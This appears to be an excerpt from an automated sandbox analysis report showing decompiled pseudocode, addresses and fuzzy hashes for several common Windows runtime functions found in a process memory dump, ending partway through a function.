                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B8EC7, Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E011B8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x126d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E011A4E70(0x12686e4, 0x11b9490, 0, 0);
					if( *0x12653e8 > 5 && E011B8F33(0x12653e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x12653e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x12653e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x115bc46;
						_t48 = E011F7B9C(0x12653e8, 0x115bc46, _t67, 0x12653e8, _t70,  &_v140);
					}
				}
				return E011BB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                          0x011b8ec7
                                                                          0x011b8ed9
                                                                          0x011b8edc
                                                                          0x011b8ee6
                                                                          0x011b8ee9
                                                                          0x011b8eee
                                                                          0x011b8efc
                                                                          0x011b8f08
                                                                          0x011f1349
                                                                          0x011f1353
                                                                          0x011f135d
                                                                          0x011f1366
                                                                          0x011f136f
                                                                          0x011f1375
                                                                          0x011f137c
                                                                          0x011f1385
                                                                          0x011f1390
                                                                          0x011f1391
                                                                          0x011f139c
                                                                          0x011f139d
                                                                          0x011f13a6
                                                                          0x011f13ac
                                                                          0x011f13b2
                                                                          0x011f13b5
                                                                          0x011f13bc
                                                                          0x011f13bf
                                                                          0x011f13c2
                                                                          0x011f13c5
                                                                          0x011f13c8
                                                                          0x011f13cb
                                                                          0x011f13ce
                                                                          0x011f13d1
                                                                          0x011f13d4
                                                                          0x011f13d7
                                                                          0x011f13da
                                                                          0x011f13dd
                                                                          0x011f13e0
                                                                          0x011f13e3
                                                                          0x011f13e6
                                                                          0x011f13e9
                                                                          0x011f13f6
                                                                          0x011f1400
                                                                          0x011f1400
                                                                          0x011b8f08
                                                                          0x011b8f32

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6c4c7b79e286d4b02f29b8ab0d1b8f1f6811361f9083bac0944ba9b887d6516
                                                                          • Instruction ID: f6860f79f1a7ce8434e997d69030d96c5b26e338457e710e231c0db2e928b61d
                                                                          • Opcode Fuzzy Hash: a6c4c7b79e286d4b02f29b8ab0d1b8f1f6811361f9083bac0944ba9b887d6516
                                                                          • Instruction Fuzzy Hash: F0418FB1D003189EDB24CFAAD981AEDFBF8FB48710F5081AEE549A7640E7745A84CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AE730, Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 74%
                                                                          			E011AE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E011B9670() < 0) {
					L011CDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1267b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01194620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M011AE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                          0x011ae730
                                                                          0x011ae736
                                                                          0x011ae738
                                                                          0x011ae73d
                                                                          0x011ae73e
                                                                          0x011ae740
                                                                          0x011ae749
                                                                          0x011ae765
                                                                          0x011ae76a
                                                                          0x011ae76b
                                                                          0x011ae76c
                                                                          0x011ae76d
                                                                          0x011ae76e
                                                                          0x011ae76f
                                                                          0x011ae775
                                                                          0x011ae777
                                                                          0x011ae77e
                                                                          0x011eb675
                                                                          0x011ae784
                                                                          0x011ae784
                                                                          0x011ae789
                                                                          0x011ae7a8
                                                                          0x011ae7ac
                                                                          0x011ae807
                                                                          0x011ae7ae
                                                                          0x011ae7ae
                                                                          0x011ae7b1
                                                                          0x011ae7b4
                                                                          0x011ae7b9
                                                                          0x011ae7c0
                                                                          0x011ae7c4
                                                                          0x011ae7ca
                                                                          0x011ae7cc
                                                                          0x00000000
                                                                          0x011ae7d3
                                                                          0x011ae7d6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ae7ff
                                                                          0x011ae802
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ae7f9
                                                                          0x011ae7fc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ae7f3
                                                                          0x011ae7f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ae7ed
                                                                          0x011ae7f0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ae7e7
                                                                          0x011ae7ea
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011eb685
                                                                          0x011eb688
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011eb682
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ae7cc
                                                                          0x011ae7d9
                                                                          0x011ae7dc
                                                                          0x011ae7de
                                                                          0x011ae7de
                                                                          0x011ae7ac
                                                                          0x011ae7e4
                                                                          0x011ae74b
                                                                          0x011ae751
                                                                          0x011ae759
                                                                          0x011ae761
                                                                          0x011ae761

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 901013c8c5ccae2d6cc1ebe00e035fd7468ecd741e4e171b85023b2c5458bc09
                                                                          • Instruction ID: c7821e4d586e35d07e7ecdb349bac57f671aab49be069a564a794ff096d56c1e
                                                                          • Opcode Fuzzy Hash: 901013c8c5ccae2d6cc1ebe00e035fd7468ecd741e4e171b85023b2c5458bc09
                                                                          • Instruction Fuzzy Hash: A0315CB9A14249AFD748CF58D841B9ABBE4FB09314F548266FA14CB341E731E980CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011ABC2C, Relevance: .1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 67%
                                                                          			E011ABC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1266100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01192280(0xd, 0x5bff1a0);
				_t41 =  *0x12660f8; // 0x0
				if(_t41 != 0) {
					 *0x12660f8 =  *_t41;
					 *0x12660fc =  *0x12660fc + 0xffff;
				}
				E0118FFB0(_t41, 0x800, 0x5bff1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x12660f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01194620(0x1266100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1266100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                          0x011abc36
                                                                          0x011abc42
                                                                          0x011abc45
                                                                          0x011abc4a
                                                                          0x011abd35
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011abc50
                                                                          0x011abc50
                                                                          0x011abc58
                                                                          0x011abc5a
                                                                          0x011abc60
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ea4f2
                                                                          0x011ea4f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ea4fc
                                                                          0x011abc79
                                                                          0x011abc7e
                                                                          0x011abc86
                                                                          0x011abd16
                                                                          0x011abd20
                                                                          0x011abd20
                                                                          0x011abc8d
                                                                          0x011abc94
                                                                          0x011abcbd
                                                                          0x011abcca
                                                                          0x011abccb
                                                                          0x011abccc
                                                                          0x011abccd
                                                                          0x011abcce
                                                                          0x011abcd4
                                                                          0x011abcea
                                                                          0x011abcee
                                                                          0x011abcf2
                                                                          0x011abd00
                                                                          0x011abd04
                                                                          0x00000000
                                                                          0x011abc96
                                                                          0x011abcab
                                                                          0x011abcaf
                                                                          0x011abd2c
                                                                          0x011abd2c
                                                                          0x011abd09
                                                                          0x00000000
                                                                          0x011abd09
                                                                          0x011abcb1
                                                                          0x011abcb5
                                                                          0x011abcbb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011abcbb

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d2e8c7c7737be498deeaebb977493636cf369f2a4db82ff920d88efaac0eb90
                                                                          • Instruction ID: 024e1570789e85f8aea4791121e6f6136463425a8568da0b513225a192e3f692
                                                                          • Opcode Fuzzy Hash: 1d2e8c7c7737be498deeaebb977493636cf369f2a4db82ff920d88efaac0eb90
                                                                          • Instruction Fuzzy Hash: 2E31423A604686DFCB15DF58E4807AA3BB4FF18324F454078ED04EB249EB30C9458BC5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01179100, Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E01179100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x124f6e8);
				E011CD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E012488F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E011CD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x12686c0; // 0xd007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x12686b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01192280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E012488F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E011BAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x126b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x12684c0;
										if(_t69 >=  *0x12684c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01249063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0117922A(_t82);
							_t53 = E01197D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01248B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x12686c0; // 0xd007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x12686b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x12686bc;
										_t72 = 0x12686b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01179240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x12686c4;
									_t72 = 0x12686c0;
									L18:
									E011A9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                          0x01179100
                                                                          0x01179100
                                                                          0x01179100
                                                                          0x01179100
                                                                          0x01179102
                                                                          0x01179107
                                                                          0x0117910c
                                                                          0x01179110
                                                                          0x01179115
                                                                          0x01179136
                                                                          0x01179143
                                                                          0x011d37e4
                                                                          0x011d37e4
                                                                          0x01179149
                                                                          0x0117914e
                                                                          0x0117914e
                                                                          0x01179117
                                                                          0x0117911d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0117911f
                                                                          0x01179125
                                                                          0x00000000
                                                                          0x01179151
                                                                          0x01179158
                                                                          0x0117915d
                                                                          0x01179161
                                                                          0x01179168
                                                                          0x011d3715
                                                                          0x00000000
                                                                          0x0117916e
                                                                          0x0117916e
                                                                          0x01179175
                                                                          0x01179177
                                                                          0x0117917e
                                                                          0x0117917f
                                                                          0x01179182
                                                                          0x01179182
                                                                          0x01179187
                                                                          0x01179187
                                                                          0x0117918a
                                                                          0x0117918d
                                                                          0x0117918f
                                                                          0x01179192
                                                                          0x01179195
                                                                          0x01179198
                                                                          0x01179198
                                                                          0x01179198
                                                                          0x0117919a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d371f
                                                                          0x011d3721
                                                                          0x011d3727
                                                                          0x011d372f
                                                                          0x011d3733
                                                                          0x011d3735
                                                                          0x011d3738
                                                                          0x011d373b
                                                                          0x011d373d
                                                                          0x011d3740
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d3746
                                                                          0x011d3749
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d374f
                                                                          0x011d3751
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d3757
                                                                          0x011d3759
                                                                          0x011d375c
                                                                          0x011d375c
                                                                          0x011d375e
                                                                          0x011d375e
                                                                          0x011d3761
                                                                          0x011d3764
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d3766
                                                                          0x011d3768
                                                                          0x011d37a3
                                                                          0x011d37a3
                                                                          0x011d37a5
                                                                          0x011d37a7
                                                                          0x011d37ad
                                                                          0x011d37b0
                                                                          0x011d37b2
                                                                          0x011d37bc
                                                                          0x011d37c2
                                                                          0x011d37c2
                                                                          0x011d37b2
                                                                          0x01179187
                                                                          0x01179187
                                                                          0x0117918a
                                                                          0x0117918d
                                                                          0x0117918f
                                                                          0x01179192
                                                                          0x01179195
                                                                          0x00000000
                                                                          0x01179195
                                                                          0x00000000
                                                                          0x01179187
                                                                          0x011d376a
                                                                          0x011d376a
                                                                          0x011d376c
                                                                          0x011d376c
                                                                          0x011d376f
                                                                          0x011d3775
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d3777
                                                                          0x011d3779
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d3782
                                                                          0x011d3787
                                                                          0x011d3789
                                                                          0x011d3790
                                                                          0x011d3790
                                                                          0x011d378b
                                                                          0x011d378b
                                                                          0x011d378b
                                                                          0x011d3792
                                                                          0x011d3795
                                                                          0x011d3795
                                                                          0x011d3798
                                                                          0x011d3798
                                                                          0x011d379b
                                                                          0x011d379b
                                                                          0x011791a3
                                                                          0x011791a9
                                                                          0x011791b0
                                                                          0x011791b4
                                                                          0x011791b4
                                                                          0x011791bb
                                                                          0x011791c0
                                                                          0x011791c5
                                                                          0x011791c7
                                                                          0x011d37da
                                                                          0x011791cd
                                                                          0x011791cd
                                                                          0x011791cd
                                                                          0x011791d2
                                                                          0x011791d5
                                                                          0x01179239
                                                                          0x01179239
                                                                          0x011791d7
                                                                          0x011791db
                                                                          0x011791e1
                                                                          0x011791e7
                                                                          0x011791fd
                                                                          0x01179203
                                                                          0x0117921e
                                                                          0x01179223
                                                                          0x00000000
                                                                          0x01179223
                                                                          0x01179205
                                                                          0x01179208
                                                                          0x0117920c
                                                                          0x01179214
                                                                          0x01179214
                                                                          0x011791e9
                                                                          0x011791e9
                                                                          0x011791ee
                                                                          0x011791f3
                                                                          0x011791f3
                                                                          0x011791f3
                                                                          0x011791e7
                                                                          0x00000000
                                                                          0x011791db
                                                                          0x01179187
                                                                          0x01179168

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee96d5742a08a1d201fa0101975a8a457c19011d71e313b68fdb44074e510ddb
                                                                          • Instruction ID: a5db419d42d01f93c9c268087b3632e5eb4d1cd1db0c970c2d5c5fcd807c1e21
                                                                          • Opcode Fuzzy Hash: ee96d5742a08a1d201fa0101975a8a457c19011d71e313b68fdb44074e510ddb
                                                                          • Instruction Fuzzy Hash: 9E3114B1A1164ADFDB2EDB6CD088BACBBF1BB58338F19815DC51467391C330A994CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A1DB5, Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E011A1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0119F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01194620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0119F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                          0x011a1dc2
                                                                          0x011a1dc5
                                                                          0x011a1dc7
                                                                          0x011a1dcc
                                                                          0x011a1dce
                                                                          0x011a1dd6
                                                                          0x011a1ddf
                                                                          0x011a1de0
                                                                          0x011a1de1
                                                                          0x011a1de5
                                                                          0x011a1de8
                                                                          0x011a1def
                                                                          0x011a1df0
                                                                          0x011a1df6
                                                                          0x011a1df7
                                                                          0x011a1dfe
                                                                          0x011a1e1a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a1e0b
                                                                          0x011a1e12
                                                                          0x011a1e12
                                                                          0x011a1e00
                                                                          0x011a1e00
                                                                          0x011a1e05
                                                                          0x011a1e1e
                                                                          0x011a1e23
                                                                          0x011e570f
                                                                          0x011e5713
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e5719
                                                                          0x011e5719
                                                                          0x011a1e2c
                                                                          0x011a1e2d
                                                                          0x011a1e2e
                                                                          0x011a1e2f
                                                                          0x011a1e31
                                                                          0x011a1e32
                                                                          0x011a1e35
                                                                          0x011a1e3d
                                                                          0x011e5723
                                                                          0x011e573d
                                                                          0x011e573d
                                                                          0x00000000
                                                                          0x011e5723
                                                                          0x011a1e49
                                                                          0x011a1e4e
                                                                          0x011a1e4e
                                                                          0x011a1e09
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                          • Instruction ID: 8d5ff1de39dd3e88c1ef22a129ddd0a9cc375a96a4f08d2a4bfd61b432666fe5
                                                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                          • Instruction Fuzzy Hash: 3821BF7A640229FFD72ACF99CC80EAABFB9EF85654F554055EA0197210D330AE11CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01190050, Relevance: .1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E01190050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x126d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E011A9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E011BB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
